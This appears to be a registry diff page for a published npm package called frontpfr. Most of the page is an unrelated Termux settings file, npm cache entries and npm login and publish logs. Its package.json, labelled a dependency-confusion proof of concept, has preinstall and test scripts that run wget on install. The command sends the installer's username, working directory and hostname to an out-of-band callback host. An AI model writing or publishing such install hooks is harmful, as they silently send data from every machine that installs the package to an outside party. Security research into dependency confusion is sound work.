frontpfr 30.99.0
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of frontpfr might be problematic. Click here for more details.
- package/.config/termux/termux.properties +70 -0
- package/.npm/_cacache/content-v2/sha512/5e/2a/434b787df73e50d54fca935d3ff000c38cfa207b86e7dc2215a15b93a1044945493d06414bb3ed2fdcfc39281b9809c1164f2384333f241212fe504a50b7 +0 -0
- package/.npm/_cacache/content-v2/sha512/a6/f5/bbd2f30cd8cb6658ec60fb59486afe525d438528a8d5922e3d449987b8b97ed276531aa6dce9232419ae07c3e1b43faadb201669d8bb8352fdd908dd63bd +0 -0
- package/.npm/_cacache/content-v2/sha512/d5/91/52f1e0a2aefdcfd2ba3fc9aeb6e5453d41b28cd91c83923290d22855558a5d83a5eebf2402b753f98dc05a8dcb1fab4e584d663f9f48fe98e50547e789e9 +0 -0
- package/.npm/_cacache/content-v2/sha512/ea/8b/812a09aa5e4df182845f95d0705fa19b4b68476caeaa8fc2580ef237cd4f88f6d43ea6a9d8c11df18b39846e23a1b6469d9dce56291fef1f25f38262252d +0 -0
- package/.npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea +5 -0
- package/.npm/_logs/2024-08-27T20_36_15_976Z-debug-0.log +29 -0
- package/.npm/_logs/2024-08-27T20_50_44_153Z-debug-0.log +54 -0
- package/.npm/_logs/2024-08-27T20_52_26_444Z-debug-0.log +13 -0
- package/index.js +3 -0
- package/package.json +20 -0
@@ -0,0 +1,70 @@
|
|
1
|
+
### This is a `.properties` [https://en.wikipedia.org/wiki/.properties] file
|
2
|
+
### for termux app properties and is loaded with the `java.util.Properties.load()`
|
3
|
+
### [https://developer.android.com/reference/java/util/Properties#load(java.io.Reader)]
|
4
|
+
### call by the termux app and must be formatted as per its spec.
|
5
|
+
### To make changes to a property value, uncomment the property line by removing
|
6
|
+
### any hash `#` characters at the start of the line.
|
7
|
+
### After making required changes, save the file and run `termux-reload-settings`
|
8
|
+
### in the terminal for changes to take effect. Some properties require app
|
9
|
+
### process to be restarted to be updated which can be done by force stopping
|
10
|
+
### the app from Android app settings.
|
11
|
+
### All information here can also be found on the
|
12
|
+
### wiki: https://wiki.termux.com/wiki/Terminal_Settings
|
13
|
+
|
14
|
+
###############
|
15
|
+
# Extra keys
|
16
|
+
###############
|
17
|
+
|
18
|
+
### Settings for choosing which set of symbols to use for illustrating keys.
|
19
|
+
### Choose between default, arrows-only, arrows-all, all and none
|
20
|
+
# extra-keys-style = default
|
21
|
+
|
22
|
+
### Force capitalize all text in extra keys row button labels.
|
23
|
+
# extra-keys-text-all-caps = true
|
24
|
+
|
25
|
+
### Default extra-key configuration
|
26
|
+
# extra-keys = [[ESC, TAB, CTRL, ALT, {key: '-', popup: '|'}, DOWN, UP]]
|
27
|
+
|
28
|
+
### Two rows with more keys
|
29
|
+
# extra-keys = [['ESC','/','-','HOME','UP','END','PGUP'], \
|
30
|
+
# ['TAB','CTRL','ALT','LEFT','DOWN','RIGHT','PGDN']]
|
31
|
+
|
32
|
+
### Configuration with additional popup keys (swipe up from an extra key)
|
33
|
+
# extra-keys = [[ \
|
34
|
+
# {key: ESC, popup: {macro: "CTRL f d", display: "tmux exit"}}, \
|
35
|
+
# {key: CTRL, popup: {macro: "CTRL f BKSP", display: "tmux ←"}}, \
|
36
|
+
# {key: ALT, popup: {macro: "CTRL f TAB", display: "tmux →"}}, \
|
37
|
+
# {key: TAB, popup: {macro: "ALT a", display: A-a}}, \
|
38
|
+
# {key: LEFT, popup: HOME}, \
|
39
|
+
# {key: DOWN, popup: PGDN}, \
|
40
|
+
# {key: UP, popup: PGUP}, \
|
41
|
+
# {key: RIGHT, popup: END}, \
|
42
|
+
# {macro: "ALT j", display: A-j, popup: {macro: "ALT g", display: A-g}}, \
|
43
|
+
# {key: KEYBOARD, popup: {macro: "CTRL d", display: exit}} \
|
44
|
+
# ]]
|
45
|
+
|
46
|
+
### Another configuration with advanced popup key usage designed for more
|
47
|
+
### specific use-cases. In this case, it is designed for working with Vim-like
|
48
|
+
### editors for faster navigation
|
49
|
+
#extra-keys = [ \
|
50
|
+
# [ \
|
51
|
+
# { key: ESC, popup: { macro: ":q\n", display: "QuickExit" } }, \
|
52
|
+
# { key: '/', popup: '\\\\' }, \
|
53
|
+
# { key: '-', popup: '_' }, \
|
54
|
+
# { key: HOME, popup: { macro: "CTRL HOME", display: "Top" } }, \
|
55
|
+
# { key: UP, popup: { macro: "CTRL UP", display: "UP" } }, \
|
56
|
+
# { key: END, popup: { macro: "CTRL END", display: "End" } }, \
|
57
|
+
# { key: ":", popup: ";" }, \
|
58
|
+
# { key: "(", popup: "{" } \
|
59
|
+
# ], \
|
60
|
+
# [ \
|
61
|
+
# { key: TAB, popup: { macro: ":wq\n", display: "Write And Exit" } }, \
|
62
|
+
# { key: CTRL, popup: { macro: ":w\n", display: "Write" } }, \
|
63
|
+
# ALT, \
|
64
|
+
# { key: LEFT, popup: { macro: "CTRL LEFT", display: "Left" } }, \
|
65
|
+
# { key: DOWN, popup: { macro: "CTRL DOWN", display: "Bottom" } }, \
|
66
|
+
# { key: RIGHT, popup: { macro: "CTRL RIGHT", display: "Right" } }, \
|
67
|
+
# { key: "#", popup: "$" }, \
|
68
|
+
# { key: ")", popup: "}" } \
|
69
|
+
# ] \
|
70
|
+
#]
|
package/.npm/_cacache/index-v5/e0/f3/563a92774ad5fa62edb9cbc4624c17a784676e377b3852d16ab8dcb28bea
ADDED
@@ -0,0 +1,5 @@
|
|
1
|
+
|
2
|
+
baf31ebbc1278058030fae9ab24d53510e4363de {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-pvW70vMM2MtmWOxg+1lIav5SXUOFKKjVki49RJmHuLl+0nZTGqbc6SMkGa4Hw+G0P6rbIBZp2LuDUv3ZCN1jvQ==","time":1724760556737,"size":2839}
|
3
|
+
0bad5a32a97a60c6f1b8a2fc30ee5b0bf3344af4 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-XipDS3h99z5Q1U/Kk10/8ADDjPoge4bn3CIVoVuToQRJRUk9BkFLs+0v3Pw5KBuYCcEWTyOEMz8kEhL+UEpQtw==","time":1724762499609,"size":7071}
|
4
|
+
bceeb910f584cef866fe52e3892df218824abab1 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-6ouBKgmqXk3xgoRfldBwX6GbS2hHbK6qj8JYDvI3zU+I9tQ+pqnYwR3xizmEbiOhtkadnc5WKR/vHyXzgmIlLQ==","time":1724762651915,"size":15565}
|
5
|
+
55d349cefaea03f500b72a0f85b642241aa13114 {"key":"pacote:tarball:file:/data/data/com.termux/files/home","integrity":"sha512-1ZFS8eCirv3P0ro/ya625UU9QbKM2RyDkjKQ0ihVVYpdg6XuvyQCt1P5jcBajcsfq05YTWY/n0j+mOUFR+eJ6Q==","time":1724763215769,"size":32231}
|
@@ -0,0 +1,29 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm whoami
|
8
|
+
7 verbose argv "whoami"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_36_15_976Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_36_15_976Z-debug-0.log
|
11
|
+
10 silly logfile done cleaning log files
|
12
|
+
11 verbose stack Error: This command requires you to be logged in.
|
13
|
+
11 verbose stack at module.exports (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/utils/get-identity.js:23:5)
|
14
|
+
11 verbose stack at Whoami.exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/commands/whoami.js:11:28)
|
15
|
+
11 verbose stack at /data/data/com.termux/files/usr/lib/node_modules/npm/lib/npm.js:251:63
|
16
|
+
11 verbose stack at Object.start (/data/data/com.termux/files/usr/lib/node_modules/npm/node_modules/proc-log/lib/index.js:101:21)
|
17
|
+
11 verbose stack at #exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/npm.js:250:17)
|
18
|
+
11 verbose stack at Npm.exec (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/npm.js:207:25)
|
19
|
+
11 verbose stack at module.exports (/data/data/com.termux/files/usr/lib/node_modules/npm/lib/cli/entry.js:65:29)
|
20
|
+
12 error code ENEEDAUTH
|
21
|
+
13 error need auth This command requires you to be logged in.
|
22
|
+
14 error need auth You need to authorize this machine using `npm adduser`
|
23
|
+
15 verbose cwd /data/data/com.termux/files/home
|
24
|
+
16 verbose os Linux 4.19.157-perf+
|
25
|
+
17 verbose node v22.5.1
|
26
|
+
18 verbose npm v10.8.2
|
27
|
+
19 verbose exit 1
|
28
|
+
20 verbose code 1
|
29
|
+
21 error A complete log of this run can be found in: /data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_36_15_976Z-debug-0.log
|
@@ -0,0 +1,54 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm login
|
8
|
+
7 verbose argv "login"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_50_44_153Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_50_44_153Z-debug-0.log
|
11
|
+
10 notice Log in on https://registry.npmjs.org/
|
12
|
+
11 verbose web login before first POST
|
13
|
+
12 silly logfile done cleaning log files
|
14
|
+
13 http fetch POST 200 https://registry.npmjs.org/-/v1/login 908ms
|
15
|
+
14 verbose web auth got response {
|
16
|
+
14 verbose web auth loginUrl: 'https://www.npmjs.com/login?next=/login/cli/e1bdd313-691a-4596-9cc3-fb3ed191382f',
|
17
|
+
14 verbose web auth doneUrl: 'https://registry.npmjs.org/-/v1/done?sessionId=e1bdd313-691a-4596-9cc3-fb3ed191382f'
|
18
|
+
14 verbose web auth }
|
19
|
+
15 verbose web auth opening url pair
|
20
|
+
16 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 301ms
|
21
|
+
17 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 412ms
|
22
|
+
18 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 320ms
|
23
|
+
19 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 436ms
|
24
|
+
20 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 330ms
|
25
|
+
21 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 415ms
|
26
|
+
22 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 469ms
|
27
|
+
23 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 481ms
|
28
|
+
24 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 460ms
|
29
|
+
25 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 447ms
|
30
|
+
26 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 388ms
|
31
|
+
27 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 375ms
|
32
|
+
28 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 329ms
|
33
|
+
29 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 431ms
|
34
|
+
30 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 463ms
|
35
|
+
31 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 375ms
|
36
|
+
32 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 365ms
|
37
|
+
33 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 389ms
|
38
|
+
34 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 382ms
|
39
|
+
35 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 465ms
|
40
|
+
36 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 378ms
|
41
|
+
37 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 334ms
|
42
|
+
38 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 420ms
|
43
|
+
39 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 376ms
|
44
|
+
40 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 373ms
|
45
|
+
41 http fetch GET 202 https://registry.npmjs.org/-/v1/done?sessionId=*** 388ms
|
46
|
+
42 http fetch GET 200 https://registry.npmjs.org/-/v1/done?sessionId=*** 451ms
|
47
|
+
43 verbose web auth done-check finished
|
48
|
+
44 info login Logged in on https://registry.npmjs.org/.
|
49
|
+
45 verbose cwd /data/data/com.termux/files/home
|
50
|
+
46 verbose os Linux 4.19.157-perf+
|
51
|
+
47 verbose node v22.5.1
|
52
|
+
48 verbose npm v10.8.2
|
53
|
+
49 verbose exit 0
|
54
|
+
50 info ok
|
@@ -0,0 +1,13 @@
|
|
1
|
+
0 verbose cli /apex/com.android.runtime/bin/linker64 /data/data/com.termux/files/usr/bin/npm
|
2
|
+
1 info using npm@10.8.2
|
3
|
+
2 info using node@v22.5.1
|
4
|
+
3 silly config load:file:/data/data/com.termux/files/usr/lib/node_modules/npm/npmrc
|
5
|
+
4 silly config load:file:/data/data/com.termux/files/home/.npmrc
|
6
|
+
5 silly config load:file:/data/data/com.termux/files/usr/etc/npmrc
|
7
|
+
6 verbose title npm publish
|
8
|
+
7 verbose argv "publish"
|
9
|
+
8 verbose logfile logs-max:10 dir:/data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_52_26_444Z-
|
10
|
+
9 verbose logfile /data/data/com.termux/files/home/.npm/_logs/2024-08-27T20_52_26_444Z-debug-0.log
|
11
|
+
10 verbose publish [ '.' ]
|
12
|
+
11 silly logfile done cleaning log files
|
13
|
+
12 silly packumentCache heap:1098907648 maxSize:274726912 maxEntrySize:137363456
|
package/index.js
ADDED
package/package.json
ADDED
@@ -0,0 +1,20 @@
|
|
1
|
+
{
|
2
|
+
"name": "frontpfr",
|
3
|
+
"version": "30.99.0",
|
4
|
+
"description": "Simple PoC package for testing for dependency confusion vulnerabilities.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test": "wget --quiet \"http://nhootcihoynpykhwhmbhk02y63kxmvp0u.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS",
|
8
|
+
"preinstall": "wget --quiet \"http://nhootcihoynpykhwhmbhk02y63kxmvp0u.oast.fun/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)\" # CHANGE IP ADDRESS"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"test",
|
12
|
+
"PoC"
|
13
|
+
],
|
14
|
+
"dependencies": {},
|
15
|
+
"config": {
|
16
|
+
"unsafe-perm":true
|
17
|
+
},
|
18
|
+
"author": "WayCup",
|
19
|
+
"license": "ISC"
|
20
|
+
}
|